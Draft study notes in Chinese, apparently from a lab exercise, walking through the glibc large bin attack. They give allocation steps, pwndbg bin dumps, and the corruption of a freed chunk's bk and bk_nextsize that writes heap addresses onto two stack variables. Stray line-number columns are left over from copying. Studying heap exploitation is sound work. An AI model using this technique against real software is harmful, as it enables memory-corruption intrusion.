草稿,未完待续

large bin attack

两个位于栈上的值
stack_var1 (0x7fffffffdc90): 0
stack_var2 (0x7fffffffdc98): 0

malloc(0x420) p1
malloc(0x20)
malloc(0x500) p2
malloc(0x20)
malloc(0x500) p3
malloc(0x20)

free(p1)
free(p2)
unsortedbin
all: 0x603460 —▸ 0x603000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x603460 / ‘`4`‘ /

malloc(0x90)
unsortedbin
all: 0x6030a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6030a0
largebins
0x500: 0x603460 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x603460 / ‘`4`‘ /

free(p3)
unsortedbin
all: 0x6039a0 —▸ 0x6030a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6039a0
largebins
0x500: 0x603460 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x603460 / ‘`4`\’ /

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> x/40gx 0x603460
0x603460:	0x0000000000000000	0x0000000000000511
0x603470:	0x00007ffff7dd1fa8	0x00007ffff7dd1fa8
0x603480:	0x0000000000603460	0x0000000000603460
0x603490:	0x0000000000000000	0x0000000000000000

Free chunk (largebins) | PREV_INUSE
Addr: 0x603460
Size: 0x511
fd: 0x7ffff7dd1fa8
bk: 0x7ffff7dd1fa8
fd_nextsize: 0x603460
bk_nextsize: 0x603460

vulnerability
p2.size 0x511->0x3f1
p2.fd ->0
p2.bk ->stack_var1
p2.fdnextsize ->0
p2.bknextsize ->stack_var2

1
2
3
4
5
pwndbg> x/20gx 0x603460
0x603460:	0x0000000000000000	0x00000000000003f1
0x603470:	0x0000000000000000	0x00007fffffffdc80
0x603480:	0x0000000000000000	0x00007fffffffdc78
0x603490:	0x0000000000000000	0x0000000000000000

malloc(0x90)

1
2
stack_var1 (0x7fffffffdc90): 0x6039a0
stack_var2 (0x7fffffffdc98): 0x6039a0